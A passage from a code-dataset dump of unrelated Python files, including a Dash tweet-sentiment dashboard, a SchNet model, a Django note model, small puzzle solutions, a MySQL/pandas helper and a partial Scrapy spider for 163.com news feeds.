generate_modal(),\r\n ],\r\n)\r\n\r\n\r\n# ======= Callbacks for modal popup =======\r\n@app.callback(\r\n Output(\"markdown\", \"style\"),\r\n [Input(\"learn-more-button\", \"n_clicks\"), Input(\"markdown_close\", \"n_clicks\")],\r\n)\r\ndef update_click_output(button_click, close_click):\r\n ctx = dash.callback_context\r\n\r\n if ctx.triggered:\r\n prop_id = ctx.triggered[0][\"prop_id\"].split(\".\")[0]\r\n if prop_id == \"learn-more-button\":\r\n return {\"display\": \"block\"}\r\n\r\n return {\"display\": \"none\"}\r\n\r\n\r\n# callback for tab selection\r\n@app.callback(\r\n [Output(\"app-content\", \"children\")],\r\n [Input(\"app-tabs\", \"value\")]\r\n)\r\ndef render_tab_content(tab_switch):\r\n if tab_switch == \"tab1\":\r\n return build_tab_1()\r\n return build_tab_2()\r\n\r\n\r\n# Update piechart day\r\n@app.callback(\r\n output=Output(\"piechart\", \"figure\"),\r\n inputs=[Input(\"date-picker\", \"date\")]\r\n)\r\ndef update_piechart_d(sdate):\r\n df = df_day\r\n sdate = sdate\r\n #sdate = dt.strptime(sdate, '%d/%m/%Y').date()\r\n df = df[(df['date']==str(sdate))]\r\n p = df.iloc[0].pos\r\n n = df.iloc[0].neg\r\n nt = df.iloc[0].neut\r\n labels = ['Positive Tweets', 'Negative Tweets', 'Neutral Tweets']\r\n values = [p, n, nt]\r\n\r\n tdate = dt.strptime(sdate, '%Y-%m-%d').date()\r\n tdate = tdate.strftime(\"%d-%b-%Y\")\r\n title = 'Statistics of ' + tdate\r\n fig = go.Figure(data=[go.Pie(labels=labels, values=values, textinfo='label+percent',\r\n insidetextorientation='radial',\r\n marker_colors=['rgb(35,132,67)', 'rgb(244,59,44)', 'rgb(62,83,160)']\r\n )])\r\n\r\n fig.update_traces(textposition='inside')\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n #xaxis_showgrid=False,\r\n #yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': title,\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_layout(margin=dict(t=80, b=20, l=0, r=0))\r\n\r\n return fig\r\n\r\n\r\n# show day stats\r\n@app.callback(\r\n output=Output(\"daystats\", \"children\"),\r\n inputs=[Input(\"date-picker\", \"date\")]\r\n)\r\ndef update_dstats(sdate):\r\n df = df_day\r\n sdate = sdate\r\n #sdate = dt.strptime(sdate, '%d/%m/%Y').date()\r\n df = df[(df['date']==str(sdate))]\r\n p = df.iloc[0].pos\r\n n = df.iloc[0].neg\r\n nt = df.iloc[0].neut\r\n av = df.iloc[0].avg\r\n pn = df.iloc[0]['p/n']*1000\r\n\r\n tdate = dt.strptime(sdate, '%Y-%m-%d').date()\r\n tdate = tdate.strftime(\"%d-%b-%Y\")\r\n title = 'Statistics of ' + tdate\r\n\r\n return [\r\n html.H3(title),\r\n html.P('Total count of positive tweets on ' + tdate + ' : ' + str(p)),\r\n html.P('Total count of negative tweets on ' + tdate + ' : ' + str(n)),\r\n html.P('Total count of neutral tweets on ' + tdate + ' : ' + str(nt)),\r\n html.P('Average Sentiment Score of tweets on ' + tdate + ' : ' + str(av)),\r\n html.P('Total positive tweets per 1k negative tweets on ' + tdate + ' : ' + str(round(pn)))\r\n ]\r\n\r\n# update piechart phase\r\n@app.callback(\r\n output=Output(\"pie-graph\", \"figure\"),\r\n inputs=[Input(\"phase-dropdown\", \"value\")]\r\n)\r\ndef update_piechart_p(val):\r\n df = df_phase\r\n filter = [False, False, False, False, False, False]\r\n filter[val]=True\r\n sphase = phases[val]\r\n #sdate = dt.strptime(sdate, '%d/%m/%Y').date()\r\n df = df.loc[filter]\r\n p = df.iloc[0].pos\r\n n = df.iloc[0].neg\r\n nt = df.iloc[0].neut\r\n labels = ['Positive Tweets', 'Negative Tweets', 'Neutral Tweets']\r\n values = [p, n, nt]\r\n\r\n title = 'Statistics of ' + sphase\r\n fig = go.Figure(data=[go.Pie(labels=labels, values=values, textinfo='label+percent',\r\n insidetextorientation='radial',\r\n marker_colors=['rgb(35,132,67)', 'rgb(244,59,44)', 'rgb(62,83,160)']\r\n )])\r\n\r\n fig.update_traces(textposition='inside')\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n #xaxis_showgrid=False,\r\n #yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': title,\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_layout(margin=dict(t=80, b=20, l=0, r=0))\r\n\r\n return fig\r\n\r\ndef date2str(sdate):\r\n #tdate = dt.strptime(sdate, '%Y-%m-%d').date()\r\n tdate = sdate.strftime(\"%d-%b-%Y\")\r\n return tdate\r\n\r\n# show phase stats\r\n@app.callback(\r\n output=Output(\"phasestats\", \"children\"),\r\n inputs=[Input(\"phase-dropdown\", \"value\")]\r\n)\r\ndef update_pstats(val):\r\n df = df_phase\r\n filter = [False, False, False, False, False, False]\r\n filter[val]=True\r\n sphase = phases[val]\r\n df = df.loc[filter]\r\n\r\n p = df.iloc[0].pos\r\n n = df.iloc[0].neg\r\n nt = df.iloc[0].neut\r\n av = df.iloc[0].avg\r\n dp = df.iloc[0]['date_mpos']\r\n dn = df.iloc[0]['date_mneg']\r\n pn = df.iloc[0]['p/n']*1000\r\n st = df.iloc[0].start\r\n ed = df.iloc[0].end\r\n drn = ed-st\r\n #dt.strptime(ed, '%Y-%m-%d').date() - dt.strptime(st, '%Y-%m-%d').date()\r\n\r\n dp = date2str(dp)\r\n dn = date2str(dn)\r\n st = date2str(st)\r\n ed = date2str(ed)\r\n title = 'Statistics of ' + sphase\r\n\r\n return [\r\n html.H3(title),\r\n html.P('The ' + sphase + ' started on : ' + st + ' and ended on : ' + ed),\r\n html.P('Total duration of ' + sphase + ' : ' + str(drn)),\r\n #html.P('Total count of positive tweets in ' + sphase + ' : ' + str(p)),\r\n #html.P('Total count of negative tweets in ' + sphase + ' : ' + str(n)),\r\n #html.P('Total count of neutral tweets in ' + sphase + ' : ' + str(nt)),\r\n html.P('Average Sentiment Score of tweets in ' + sphase + ' : ' + str(av)),\r\n html.P('Total positive tweets per 1k negative tweets in ' + sphase + ' : ' + str(round(pn))),\r\n html.P('Date with highest p/n ratio in ' + sphase + ' : ' + dp),\r\n html.P('Date with lowest p/n ratio in ' + sphase + ' : ' + dn)\r\n ]\r\n\r\n\r\n# Running the server\r\nif __name__ == \"__main__\":\r\n app.run_server(debug=True, port=8050)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":30490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"233769307","text":"from PyQt5 import QtCore,QtGui,QtWidgets\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.use(\"Qt5Agg\")\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\n\nclass SensorDataCanvas(FigureCanvas):\n\n def __init__(self):\n plt.style.use('ggplot')\n self.fig = Figure(figsize=(8,4), dpi=100)\n self.fig.subplots_adjust(left=0.15, bottom=0.2, right=0.95, top=0.95, hspace=0.2, wspace=0.2)\n #self.fig = Figure()\n self.ax = self.fig.add_subplot(111)\n FigureCanvas.__init__(self, self.fig)\n FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n prefer_color = '#8F5429'\n self.ax.set_xlabel(\"Times\", fontdict=dict(fontsize=16, fontweight='bold', color=prefer_color))\n self.ax.set_ylabel(\"Data\", fontdict=dict(fontsize=16, fontweight='bold', color=prefer_color))\n\n #self.ax.legend()\n self.ax.set_ylim(-180, 180)\n self.ax.grid(True)\n \n self.curveObj = None\n\n def plot(self, datax, datay):\n if self.curveObj is None:\n self.curveObj, = self.ax.plot(np.array(datax), np.array(datay), 'o-', color='#DB6756')\n else:\n self.curveObj.set_data(np.array(datax), np.array(datay))\n try:\n self.ax.set_xlim(datax[0], datax[-1])\n except IndexError:\n pass\n self.draw()\n\n\n def clear(self):\n self.plot([],[])\n\n def set_ylim(self, low_bound, up_bound):\n self.ax.set_ylim(low_bound, up_bound)","sub_path":"sensor_data_canvas.py","file_name":"sensor_data_canvas.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"295378823","text":"import string\n\ndef getTriangle(n):\n return int(0.5*n*(n+1))\n\ndef getWordValue(word):\n value = 0\n for char in word.lower():\n value += ord(char) - 96\n return value\n\ndef isTriangleWord(word):\n wordValue = getWordValue(word)\n n = 1\n while(getTriangle(n) < wordValue):\n n += 1\n if(getTriangle(n) == wordValue):\n return True\n return False\n\nwith open('files_42/p042_words.txt') as file:\n lines = file.readlines()\n\ntriangleWords = 0\n\nfor line in lines:\n for word in [word for word in line.split('\"') if word != ',']:\n if(isTriangleWord(word)):\n triangleWords += 1\n\nprint(triangleWords)\n","sub_path":"42.py","file_name":"42.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"84082293","text":"import sys\n\n# Given a list of ints 1 through n missing one element, \n# print that element.\n\ndef findMissing(lst):\n\tn = len(lst)\n\ti = 0\n\tans = 0\n\twhile i < n:\n\t\tans ^= ((i+1) ^ lst[i])\n\t\ti+=1\n\tans ^= (n+1)\n\treturn ans if ans <= n else None\n\n# lst = [int(x) for x in sys.argv[1:]]\n# print findMissing(lst)","sub_path":"other/missingInt.py","file_name":"missingInt.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"461941446","text":"import MySQLdb\nimport base64\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom MySQLdb import Error\nfrom io import BytesIO\n\n\nclass DataBase:\n \"\"\"\n Initialises MySQL database connection.\n\n \"\"\"\n def connect_db(self, addr, uname, psswd, dbname):\n \"\"\"\n Establish DB connection.\n \"\"\"\n try:\n db = MySQLdb.connect(\n addr,\n uname,\n psswd,\n dbname,\n )\n if db:\n print('Connected to db: \\n', db.get_server_info())\n return db\n\n except Error as e:\n print('Database connection failed:', e)\n\n\nclass DataFrameMaker:\n\n \"\"\"\n Sends a query to database,\n reads query-data with pandas method,\n builds tables or plots based on received query-data\n \"\"\"\n\n def __init__(self, db, query):\n \"\"\"Accepts database and query, creates dataframe\"\"\"\n self.db = db\n self.query = query\n self.df = pd.read_sql(self.query, self.db)\n\n def get_frame(self, html=False):\n \"\"\"Return whole table dataframe\"\"\"\n if html:\n return self.df.to_html()\n return self.df\n\n def get_nunique_messages(self, html=False):\n \"\"\"Return dataframe with a number of non-unique messages\"\"\"\n if html:\n df = pd.DataFrame(self.df.nunique())\n return df.to_html()\n return self.df.nunique()\n\n def get_last_messages(self, num, html=False):\n \"\"\"Return number of last messages\"\"\"\n if html:\n return self.df.tail(num).to_html()\n return self.df.tail(num)\n\n def get_plot(self, html=False):\n \"\"\"Processes and returns plot image.\"\"\"\n if html:\n\n ### stack overflow solution ###\n ### https://stackoverflow.com/questions/17551956/python-given-a-bytesio-buffer-generate-img-tag-in-html ###\n self.df.plot()\n buffer = BytesIO()\n plt.savefig(buffer, format='png')\n buffer.seek(0)\n image_png = buffer.getvalue()\n buffer.close()\n graphic = base64.b64encode(image_png)\n graphic = graphic.decode('utf-8')\n\n return graphic\n\n return self.df.plot()\n","sub_path":"psqli/psqli.py","file_name":"psqli.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"237866230","text":"import math\nimport itertools\n\nimport torch\nimport torch.nn as nn\n\nimport schnetpack.nn.acsf\nimport schnetpack.nn.activations\nimport schnetpack.nn.base\nimport schnetpack.nn.cfconv\nimport schnetpack.nn.neighbors\nfrom schnetpack.data import Structure\nfrom schnetpack.nn.cutoff import HardCutoff\n\n\nclass SchNetInteraction(nn.Module):\n \"\"\"\n SchNet interaction block for modeling quantum interactions of atomistic\n systems with cosine cutoff.\n\n Args:\n n_atom_basis (int): number of features used to describe atomic environments\n n_spatial_basis (int): number of input features of filter-generating networks\n n_filters (int): number of filters used in continuous-filter convolution\n normalize_filter (bool): if true, divide filter by number of neighbors over which convolution is applied\n \"\"\"\n\n def __init__(self, n_atom_basis, n_spatial_basis, n_filters, cutoff,\n cutoff_network=HardCutoff, normalize_filter=False):\n super(SchNetInteraction, self).__init__()\n\n # initialize filters\n self.filter_network = nn.Sequential(\n schnetpack.nn.base.Dense(n_spatial_basis, n_filters,\n activation=schnetpack.nn.activations.shifted_softplus),\n schnetpack.nn.base.Dense(n_filters, n_filters)\n )\n\n self.cutoff_network = cutoff_network(cutoff)\n\n # initialize interaction blocks\n self.cfconv = schnetpack.nn.cfconv.CFConv(n_atom_basis, n_filters,\n n_atom_basis,\n self.filter_network,\n cutoff_network=self.cutoff_network,\n activation=schnetpack.nn.activations.shifted_softplus,\n normalize_filter=normalize_filter)\n self.dense = schnetpack.nn.base.Dense(n_atom_basis, n_atom_basis)\n\n def forward(self, x, r_ij, neighbors, neighbor_mask, f_ij=None):\n \"\"\"\n Args:\n x (torch.Tensor): Atom-wise input representations.\n r_ij (torch.Tensor): Interatomic distances.\n neighbors (torch.Tensor): Indices of neighboring atoms.\n neighbor_mask (torch.Tensor): Mask to indicate virtual neighbors\n introduced via zeros padding.\n f_ij (torch.Tensor): Use at your own risk.\n\n Returns:\n torch.Tensor: SchNet representation.\n \"\"\"\n v = self.cfconv(x, r_ij, neighbors, neighbor_mask, f_ij)\n v = self.dense(v)\n return v\n\nclass SchNetEdgeUpdate(nn.Module):\n \"\"\"\n SchNet edge update network for updating the representation of interactions.\n\n Args:\n n_atom_basis (int): number of features used to describe atomic environments\n n_spatial_basis (int): number of features for distance representation\n \"\"\"\n\n def __init__(self, n_atom_basis, n_spatial_basis, hidden_size=None):\n super(SchNetEdgeUpdate, self).__init__()\n\n if not hidden_size:\n h_size = 2*n_spatial_basis\n else:\n h_size = hidden_size\n\n self.edge_network = nn.Sequential(\n schnetpack.nn.base.Dense(2*n_atom_basis+n_spatial_basis, h_size,\n activation=schnetpack.nn.activations.shifted_softplus),\n schnetpack.nn.base.Dense(h_size, n_spatial_basis)\n )\n\n def forward(self, x, neighbors, f_ij):\n\n # Expected dimensions:\n # x (bs x n_at x n_atom_basis)\n # neighbors (bs x n_at x n_neigh)\n # f_ij (bs x n_at x n_neigh x n_spatial_basis)\n\n # Construct auxiliary index vector\n n_batch = x.size()[0]\n idx_m = torch.arange(n_batch, device=x.device, dtype=torch.long)[:,\n None, None]\n # Gather representations of all neighors\n x_neighbors = x[idx_m, neighbors, :]\n\n # Expand atom representation\n n_neighbors = neighbors.size()[2]\n x_expand = x[:,:,None,:].expand(-1, -1, n_neighbors, -1)\n\n # Concatenate edge representation, sending atom, and receiving atom\n edge_network_input = torch.cat((f_ij, x_neighbors, x_expand), 3)\n\n # Compute new edge representation\n f_ij_new = self.edge_network(edge_network_input)\n\n return f_ij_new\n\n\nclass SchNet(nn.Module):\n \"\"\"\n SchNet architecture for learning representations of atomistic systems\n as described in [#schnet1]_ [#schnet_transfer]_ [#schnet3]_\n\n Args:\n n_atom_basis (int): number of features used to describe atomic environments\n n_filters (int): number of filters used in continuous-filter convolution\n n_interactions (int): number of interaction blocks\n cutoff (float): cutoff radius of filters\n n_gaussians (int): number of Gaussians which are used to expand atom distances\n normalize_filter (bool): if true, divide filter by number of neighbors\n over which convolution is applied\n coupled_interactions (bool): if true, share the weights across\n interaction blocks and filter-generating networks.\n return_intermediate (bool): if true, also return intermediate feature\n representations after each interaction block\n max_z (int): maximum allowed nuclear charge in dataset. This determines\n the size of the embedding matrix.\n\n References\n ----------\n .. [#schnet1] Schütt, Arbabzadah, Chmiela, Müller, Tkatchenko:\n Quantum-chemical insights from deep tensor neural networks.\n Nature Communications, 8, 13890. 2017.\n .. [#schnet_transfer] Schütt, Kindermans, Sauceda, Chmiela, Tkatchenko, Müller:\n SchNet: A continuous-filter convolutional neural network for modeling quantum interactions.\n In Advances in Neural Information Processing Systems, pp. 992-1002. 2017.\n .. [#schnet3] Schütt, Sauceda, Kindermans, Tkatchenko, Müller:\n SchNet - a deep learning architecture for molceules and materials.\n The Journal of Chemical Physics 148 (24), 241722. 2018.\n \"\"\"\n\n def __init__(self, n_atom_basis=128, n_filters=128, n_interactions=1,\n cutoff=5.0, n_gaussians=25,\n normalize_filter=False, coupled_interactions=False,\n return_intermediate=False, max_z=100,\n cutoff_network=HardCutoff, trainable_gaussians=False,\n distance_expansion=None, charged_systems=False,\n trainable_edges=False):\n super(SchNet, self).__init__()\n\n # atom type embeddings\n scale = 1. / math.sqrt(n_atom_basis)\n embedding_init = torch.randn(max_z, n_atom_basis)*scale\n self.embedding = nn.Embedding(max_z, n_atom_basis, padding_idx=0, _weight=embedding_init)\n\n # spatial features\n self.distances = schnetpack.nn.neighbors.AtomDistances()\n if distance_expansion is None:\n self.distance_expansion = schnetpack.nn.acsf.GaussianSmearing(\n 0.0, cutoff, n_gaussians, trainable=trainable_gaussians)\n else:\n self.distance_expansion = distance_expansion\n\n self.return_intermediate = return_intermediate\n\n self.charged_systems = charged_systems\n if charged_systems:\n self.charge = nn.Parameter(torch.Tensor(1, n_atom_basis))\n self.charge.data.normal_(0, 1. / math.sqrt(n_atom_basis))\n\n # interaction network\n if coupled_interactions:\n self.interactions = nn.ModuleList(\n [\n SchNetInteraction(\n n_atom_basis=n_atom_basis,\n n_spatial_basis=n_gaussians,\n n_filters=n_filters,\n cutoff_network=cutoff_network,\n cutoff=cutoff,\n normalize_filter=normalize_filter)\n ] * n_interactions)\n else:\n self.interactions = nn.ModuleList([\n SchNetInteraction(n_atom_basis=n_atom_basis,\n n_spatial_basis=n_gaussians,\n n_filters=n_filters,\n cutoff_network=cutoff_network,\n cutoff=cutoff,\n normalize_filter=normalize_filter)\n for _ in range(n_interactions)\n ])\n # edge update network\n if trainable_edges:\n if coupled_interactions:\n self.edge_updates = nn.ModuleList([\n SchNetEdgeUpdate(n_atom_basis, n_gaussians)\n ] * n_interactions)\n else:\n self.edge_updates = nn.ModuleList([\n SchNetEdgeUpdate(n_atom_basis, n_gaussians)\n for _ in range(n_interactions)])\n else:\n self.edge_updates = []\n\n\n def forward(self, inputs):\n \"\"\"\n Args:\n inputs (dict of torch.Tensor): SchNetPack format dictionary of input tensors.\n\n Returns:\n torch.Tensor: Final Atom-wise SchNet representation.\n torch.Tensor: Atom-wise SchNet representation of intermediate layers.\n \"\"\"\n atomic_numbers = inputs[Structure.Z]\n positions = inputs[Structure.R]\n cell = inputs[Structure.cell]\n cell_offset = inputs[Structure.cell_offset]\n neighbors = inputs[Structure.neighbors]\n neighbor_mask = inputs[Structure.neighbor_mask]\n atom_mask = inputs[Structure.atom_mask]\n\n # atom embedding\n x = self.embedding(atomic_numbers)\n\n if False and self.charged_systems and Structure.charge in inputs.keys():\n n_atoms = torch.sum(atom_mask, dim=1, keepdim=True)\n charge = inputs[Structure.charge] / n_atoms # B\n charge = charge[:, None] * self.charge # B x F\n x = x + charge\n\n # spatial features\n r_ij = self.distances(positions, neighbors, cell, cell_offset,\n neighbor_mask=neighbor_mask)\n f_ij = self.distance_expansion(r_ij)\n\n # interactions\n if self.return_intermediate:\n xs = [x]\n\n for edge_update, interaction in itertools.zip_longest(self.edge_updates, self.interactions):\n if edge_update:\n f_ij = edge_update(x, neighbors, f_ij)\n v = interaction(x, r_ij, neighbors, neighbor_mask, f_ij=f_ij)\n x = x + v\n\n if self.return_intermediate:\n xs.append(xs)\n\n if self.return_intermediate:\n return x, xs\n return x\n","sub_path":"src/schnetpack/representation/schnet.py","file_name":"schnet.py","file_ext":"py","file_size_in_byte":10648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"318384716","text":"from django.db import models\nfrom django.conf import settings\nfrom uuid import uuid4\nfrom django.db import IntegrityError\n\nfrom random import choice\nfrom string import ascii_lowercase\nfrom django.utils import timezone\n\n\nclass Note(models.Model):\n id = models.CharField(primary_key=True, unique=True, max_length=8)\n owner = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='notes', to_field='email',\n on_delete=models.CASCADE)\n topic = models.CharField(max_length=30)\n text = models.TextField(max_length=4092, blank=True, null=True)\n created_date = models.DateTimeField(auto_now_add=True, editable=False)\n last_edit = models.DateTimeField(blank=True, null=True)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.__topic = self.topic\n self.__text = self.text\n\n def save(self, *args, **kwargs):\n def _get_random_string(length):\n letters = ascii_lowercase\n result_str = ''.join(choice(letters) for i in range(length))\n return result_str\n\n if not self.id:\n self.id = _get_random_string(8)\n # using your function as above or anything else\n if self.__topic != self.topic or self.__text != self.text:\n self.last_edit = timezone.now()\n success = False\n failures = 0\n while not success:\n try:\n super(Note, self).save(*args, **kwargs)\n except IntegrityError:\n failures += 1\n if failures > 5: # or some other arbitrary cutoff point at which things are clearly wrong\n raise\n else:\n # looks like a collision, try another random value\n self.id = _get_random_string(8)\n else:\n success = True\n","sub_path":"notes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"474750902","text":"import pprint\n\n\n# 与えられたエリア全体の周囲に0パディングを行う\ndef add_padding(grid):\n max_col, max_row = len(grid[0]), len(grid)\n\n # 先頭に要素が全て0のlistを追加\n pad_grid = [[0 for x in range(max_col+2)]]\n\n # 右端、左端に要素0を追加\n for r in range(max_row):\n r_list_grid = list(grid[r])\n r_list_grid.append(0)\n r_list_grid.insert(0, 0)\n pad_grid.append(r_list_grid)\n\n # 末尾に要素が全て0のlistを追加\n pad_grid.append([0 for x in range(max_col+2)])\n\n return pad_grid\n\n\n# ターゲットの座標の周囲にある\"1\"を集計\ndef count_neighbours_pad(grid, target_row, target_col):\n count = 0\n\n for row in range(-1, 2):\n for col in range(-1, 2):\n if row == 0 and col == 0:\n pass\n else:\n count += grid[target_row + row][target_col + col]\n # print(count)\n \n return count\n\n\ndef count_neighbours(grid, row, col):\n pad_grid = add_padding(grid)\n # print.pprint(pad_grid)\n\n row_after_pad = row + 1\n col_after_pad = col + 1\n\n answer = count_neighbours_pad(pad_grid, row_after_pad, col_after_pad)\n return answer\n\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert count_neighbours(((1, 0, 0, 1, 0),\n (0, 1, 0, 0, 0),\n (0, 0, 1, 0, 1),\n (1, 0, 0, 0, 0),\n (0, 0, 1, 0, 0),), 1, 2) == 3, \"1st example\"\n assert count_neighbours(((1, 0, 0, 1, 0),\n (0, 1, 0, 0, 0),\n (0, 0, 1, 0, 1),\n (1, 0, 0, 0, 0),\n (0, 0, 1, 0, 0),), 0, 0) == 1, \"2nd example\"\n assert count_neighbours(((1, 1, 1),\n (1, 1, 1),\n (1, 1, 1),), 0, 2) == 3, \"Dense corner\"\n assert count_neighbours(((0, 0, 0),\n (0, 1, 0),\n (0, 0, 0),), 1, 1) == 0, \"Single\"\n\n\n\n","sub_path":"MooreNeighbourhood.py","file_name":"MooreNeighbourhood.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"36991779","text":"# -*- coding: utf-8 -*-\nimport re\nimport json\nimport scrapy\nfrom cctv_OpinionMonitor2 import helper\nfrom cctv_OpinionMonitor2.items import CctvOpinionmonitor2Item\nfrom scrapy.http import Request\n\n# #要闻\n# 'http://c.m.163.com/dlist/article/dynamic?{}'\n# par = {\n# 'from':'T1467284926140',\n# 'offset':'0',\n# 'size':'20',\n# 'fn':'1',\n# 'LastStdTime':'0',\n# 'passport':'',\n# 'devId':'UtQj6VTqfPTNdHOhqXgx4w%3D%3D',\n# # 'lat':'nEob1URk2zlHby%2FZRQvN9A%3D%3D',\n# # 'lon':'gnbXwKYIXyBHzMQxFSRSxQ%3D%3D',\n# 'version':'54.6',\n# 'net':'wifi',\n# # 'ts':'1556091859',\n# # 'sign':'uqtTuIyP5oD9HzgvKRKuccyK81gp7LyGqaF2wqK%2F62B48ErR02zJ6%2FKXOnxX046I',\n# 'encryption':'1',\n# 'canal':'miliao_news',\n# # 'mac':'I0hRorjreoVkNP82fbwMpUn4xdWy8S3keUAmEYPgEfc%3D',\n# # 'open':'',\n# # 'openpath':''\n# }\n#\n# #推荐\n# 'http://c.m.163.com/recommend/getSubDocPic?{}'\n# par2 = {\n# # 'tid':'T1348647909107',\n# 'from':'toutiao',\n# 'offset':'0',\n# 'size':'10',\n# 'fn':'3',\n# 'LastStdTime':'0',\n# 'spestr':'reader_expert_1',\n# # 'prog':'bjrec_toutiaotoutiao-1100000423-1200000585-1110000662-1111000458-1111000774-1111000698-1111000797-1111000478-1111000673-1200000742-1200000685-1200000604-1111000619-1200000724-1111000438-1111000834-1111000592-1111000394-1111000589-1200000673-1111000545-1200000594-1111000543-1200000710-1200000677-1200000632-1111000289-1111000388-1111000242-1200000576-1200000652-1111000828-1111000729-1200000734-1111000629-1200000678-1111000626-1111000701-1111000548e',\n# 'passport':'',\n# 'devId':'UtQj6VTqfPTNdHOhqXgx4w%3D%3D',\n# # 'lat':'nEob1URk2zlHby%2FZRQvN9A%3D%3D',\n# # 'lon':'gnbXwKYIXyBHzMQxFSRSxQ%3D%3D',\n# 'version':'54.6',\n# 'net':'wifi',\n# # 'ts':'1556095657',\n# # 'sign':'QKcKkwKuzkBU7u6u%2B67TXuGGUbk990WpvAlMfaMcqUx48ErR02zJ6%2FKXOnxX046I',\n# 'encryption':'1',\n# 'canal':'miliao_news',\n# # 'mac':'I0hRorjreoVkNP82fbwMpUn4xdWy8S3keUAmEYPgEfc%3D',\n# # 'open':'',\n# # 'openpath':''\n# }\n# 不需要headers\n\n# 'http://c.m.163.com/nc/article/list/T1414142214384/{}-20.html'\n# 需要headers\n\nclass A163ComSpider(scrapy.Spider):\n name = '163.com'\n limittime = '2018-01-01'\n\n entry_point = {\n '要闻': 'http://c.m.163.com/dlist/article/dynamic?from=T1467284926140&offset=0&size=20&fn=1&LastStdTime=0&passport=&devId=UtQj6VTqfPTNdHOhqXgx4w%3D%3D&version=54.6&net=wifi&encryption=1&canal=miliao_news',\n '头条': 'http://c.m.163.com/recommend/getSubDocPic?from=T1467284926140&offset=0&size=20&fn=1&LastStdTime=0&passport=&devId=UtQj6VTqfPTNdHOhqXgx4w%3D%3D&version=54.6&net=wifi&encryption=1&canal=miliao_news',\n '财经': 'http://c.m.163.com/dlist/article/dynamic?from=T1348648756099&offset=0&size=10&fn=1&LastStdTime=0&passport=&devId=UtQj6VTqfPTNdHOhqXgx4w%3D%3D&version=55.1&net=wifi&encryption=1&canal=miliao_news&open=&openpath=',\n '新时代': 'http://c.m.163.com/nc/article/list/T1414142214384/0-20.html'\n }\n\n headers = {\n 'User-Agent': 'NewsApp/54.6 Android/4.4.4 (Xiaomi/MI 3C)'\n }\n\n def start_requests(self):\n for key in self.entry_point.keys():\n yield Request(url=self.entry_point[key], callback=self.yaowen_parse, headers=self.headers, dont_filter=True)\n\n def caijing_parse(self, response):\n jsonbd = json.loads(response.text)\n if len(jsonbd['T1348648756099']) == 0: return\n for item in jsonbd['T1348648756099']:\n if 'postid' not in item.keys() or len(item['postid']) == 0: continue\n id = item['postid'] if 'postid' in item.keys() else None\n date = item['ptime'] if 'ptime' in item.keys() else None\n source = item['source'] if 'source' in item.keys() else None\n title = item['title'] if 'title' in item.keys() else None\n url = 'http://c.m.163.com/nc/article/preload/{}/full.html'.format(id)\n yield Request(url=url, callback=self.content2_parse, encoding='utf-8', headers=self.headers,\n meta={'date': date, 'id': id, 'source': source, 'title':title})\n\n def newtime_parse(self, response):\n jsonbd = json.loads(response.text)\n if len(jsonbd['T1414142214384']) == 0: return\n for item in jsonbd['T1414142214384']:\n if 'url_3w' not in item.keys() or len(item['url_3w']) == 0: continue\n url = item['url_3w']\n like = item['votecount'] if 'votecount' in item.keys() else None\n id = item['postid'] if 'postid' in item.keys() else None\n date = item['ptime'] if 'ptime' in item.keys() else None\n source = item['source'] if 'source' in item.keys() else None\n replyCount = item['replyCount'] if 'replyCount' in item.keys() else None\n yield Request(url=url, callback=self.content_parse, encoding='utf-8', meta={'like':like,'id':id,'date':date,'replyCount':replyCount,'source':source})\n\n def yaowen_parse(self, response):\n jsonbd = json.loads(response.text)\n if len(jsonbd['T1467284926140']) == 0: return\n for item in jsonbd['T1467284926140']:\n if 'url_3w' not in item.keys() or len(item['url_3w']) == 0: continue\n url = item['url_3w']\n like = item['votecount'] if 'votecount' in item.keys() else None\n id = item['postid'] if 'postid' in item.keys() else None\n date = item['ptime'] if 'ptime' in item.keys() else None\n source = item['source'] if 'source' in item.keys() else None\n replyCount = item['replyCount'] if 'replyCount' in item.keys() else None\n yield Request(url=url, callback=self.content_parse, encoding='utf-8', meta={'like':like,'id':id,'date':date,'replyCount':replyCount,'source':source})\n\n def toutiao_parse(self, response):\n jsonbd = 